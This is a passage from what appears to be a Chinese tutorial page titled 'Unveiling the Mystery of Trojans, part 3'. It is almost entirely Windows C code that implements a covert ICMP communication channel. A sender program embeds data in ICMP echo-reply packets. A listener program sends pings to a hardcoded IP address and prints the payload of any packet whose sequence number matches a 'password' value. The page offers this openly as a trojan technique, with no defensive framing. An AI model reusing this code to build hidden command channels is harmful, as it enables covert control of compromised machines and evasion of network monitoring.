📄 揭开木马的神秘面纱3.htm
字号:
return 0;<br>
}<br>
<br>
//计算校验和函数<br>
USHORT checksum(USHORT *buffer, int size) <br>
{<br>
unsigned long cksum=0;<br>
while(size >1) <br>
{<br>
cksum+=*buffer++;<br>
size -=sizeof(USHORT);<br>
}<br>
if(size ) {<br>
cksum += *(UCHAR*)buffer;<br>
}<br>
cksum = (cksum >> 16) + (cksum & 0xffff);<br>
cksum += (cksum >>16);<br>
return (USHORT)(~cksum);<br>
}<br>
<br>
//填充ICMP数据报函数<br>
void fill_icmp_data(char * icmp_data, int datasize)<br>
{<br>
int i;<br>
char SendMsg[20]="Hello World!";<br>
IcmpHeader *icmp_hdr;<br>
char *datapart;<br>
icmp_hdr = (IcmpHeader*)icmp_data;<br>
icmp_hdr->i_type = ICMP_ECHOREPLY;<br>
icmp_hdr->i_code = 0;<br>
icmp_hdr->i_id = (USHORT) GetCurrentProcessId();<br>
icmp_hdr->i_cksum = 0;<br>
icmp_hdr->i_seq = 0;<br>
datapart = icmp_data + sizeof(IcmpHeader);<br>
for(i=0;i<sizeof(SendMsg);i++) datapart[i]=SendMsg[i]; <br>
}<br>
<br>
<br>
2、接收ICMP_ECHOREPLY报文的程序代码<br>
#include <winsock2.h><br>
#include <stdio.h><br>
#include <stdlib.h><br>
<br>
#define ICMP_ECHO 8<br>
#define ICMP_ECHOREPLY 0<br>
#define ICMP_MIN 8 // minimum 8 byte icmp packet (just header)<br>
#define ICMP_PASSWORD 1234<br>
<br>
/* The IP header */<br>
typedef struct iphdr {<br>
unsigned int h_len:4; //4位首部长度<br>
unsigned int version:4; //IP版本号,4表示IPV4<br>
unsigned char tos; //8位服务类型TOS<br>
unsigned short total_len; //16位总长度(字节)<br>
unsigned short ident; //16位标识<br>
unsigned short frag_and_flags; //3位标志位<br>
unsigned char ttl; //8位生存时间 TTL<br>
unsigned char proto; //8位协议 (TCP, UDP 或其他)<br>
unsigned short checksum; //16位IP首部校验和<br>
unsigned int sourceIP; //32位源IP地址<br>
unsigned int destIP; //32位目的IP地址<br>
}IpHeader;<br>
<br>
<br>
//定义ICMP首部<br>
typedef struct _ihdr <br>
{<br>
BYTE i_type; //8位类型<br>
BYTE i_code; //8位代码<br>
USHORT i_cksum; //16位校验和 <br>
USHORT i_id; //识别号(一般用进程号作为识别号)<br>
USHORT i_seq; //报文序列号 <br>
ULONG timestamp; //时间戳<br>
}IcmpHeader;<br>
<br>
<br>
#define STATUS_FAILED 0xFFFF<br>
#define DEF_PACKET_SIZE 640<br>
#define MAX_PACKET 6500<br>
<br>
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))<br>
#define xfree(p) HeapFree (GetProcessHeap(),0,(p))<br>
<br>
void fill_icmp_data(char *, int);<br>
USHORT checksum(USHORT *, int);<br>
void decode_resp(char *,int ,struct sockaddr_in *);<br>
<br>
int main(int argc, char **argv){<br>
<br>
WSADATA wsaData;<br>
SOCKET sockRaw = (SOCKET)NULL;<br>
struct sockaddr_in dest,from;<br>
struct hostent * hp;<br>
int bread,datasize,retval;<br>
int fromlen = sizeof(from);<br>
int timeout = 1000;<br>
char *icmp_data;<br>
char *recvbuf;<br>
unsigned int addr=0;<br>
USHORT seq_no = 0;<br>
<br>
if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0){<br>
fprintf(stderr,"WSAStartup failed: %d\n",retval);<br>
ExitProcess(STATUS_FAILED);<br>
}<br>
sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);<br>
<br>
if (sockRaw == INVALID_SOCKET) {<br>
fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError());<br>
ExitProcess(STATUS_FAILED);<br>
}<br>
__try{<br>
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));<br>
if(bread == SOCKET_ERROR) <br>
{<br>
fprintf(stderr,"failed to set recv timeout: %d\n",WSAGetLastError());<br>
__leave;<br>
}<br>
bread = setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout));<br>
if(bread == SOCKET_ERROR) <br>
{<br>
fprintf(stderr,"failed to set send timeout: %d\n",WSAGetLastError());<br>
__leave;<br>
}<br>
memset(&dest,0,sizeof(dest));<br>
dest.sin_family = AF_INET;<br>
dest.sin_addr.s_addr = inet_addr("207.46.230.218");//任意IP地址<br>
datasize = DEF_PACKET_SIZE;<br>
datasize += sizeof(IcmpHeader); <br>
icmp_data = xmalloc(MAX_PACKET);<br>
recvbuf = xmalloc(MAX_PACKET);<br>
if (!icmp_data) {<br>
fprintf(stderr,"HeapAlloc failed %d\n",GetLastError());<br>
__leave;<br>
}<br>
memset(icmp_data,0,MAX_PACKET);<br>
while(1) {<br>
static int nCount = 0;<br>
int bwrote;<br>
fill_icmp_data(icmp_data,datasize);<br>
((IcmpHeader*)icmp_data)->i_cksum = 0;<br>
((IcmpHeader*)icmp_data)->timestamp = GetTickCount();<br>
((IcmpHeader*)icmp_data)->i_seq = 1111;<br>
((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize);<br>
bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));<br>
bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);<br>
if (bread == SOCKET_ERROR){<br>
if (WSAGetLastError() == WSAETIMEDOUT) {<br>
continue;<br>
}<br>
fprintf(stderr,"recvfrom failed: %d\n",WSAGetLastError());<br>
__leave;<br>
<br>
}<br>
decode_resp(recvbuf,bread,&from);<br>
Sleep(1000);<br>
}<br>
}<br>
__finally {<br>
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);<br>
WSACleanup();<br>
}<br>
return 0;<br>
}<br>
<br>
void decode_resp(char *buf, int bytes,struct sockaddr_in *from) <br>
{<br>
int i;<br>
IpHeader *iphdr;<br>
IcmpHeader *icmphdr;<br>
unsigned short iphdrlen;<br>
iphdr = (IpHeader *)buf;<br>
iphdrlen = iphdr->h_len * 4 ; <br>
icmphdr = (IcmpHeader*)(buf + iphdrlen);<br>
if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段<br>
{<br>
printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));<br>
printf(" IcmpType %d",icmphdr->i_type);<br>
printf(" IcmpCode %d",icmphdr->i_code);<br>
printf("\n");<br>
for(i=0;i<50;i++) printf("%c",*(buf+iphdrlen+i+12));<br>
}<br>
else printf("Other ICMP Packets!\n");<br>
printf("\n"); <br>
}<br>
<br>
<br>
USHORT checksum(USHORT *buffer, int size) {<br>
<br>
unsigned long cksum=0;<br>
while(size >1) {<br>
cksum+=*buffer++;<br>
size -=sizeof(USHORT);<br>
}<br>
if(size ) {<br>
cksum += *(UCHAR*)buffer;<br>
}<br>
cksum = (cksum >> 16) + (cksum & 0xffff);<br>
cksum += (cksum >>16);<br>
return (USHORT)(~cksum);<br>
}<br>
<br>
void fill_icmp_data(char * icmp_data, int datasize){<br>
IcmpHeader *icmp_hdr;<br>
char *datapart;<br>
icmp_hdr = (IcmpHeader*)icmp_data;<br>
icmp_hdr->i_type = ICMP_ECHO;<br>
icmp_hdr->i_code = 0;<br>
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();<br>
icmp_hdr->i_cksum = 0;<br>
icmp_hdr->i_seq = 12;<br>
datapart = icmp_data + sizeof(IcmpHeader);<br>
memset(datapart,‘A‘, datasize - sizeof(IcmpHeader));<br>
}<br>
</p>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -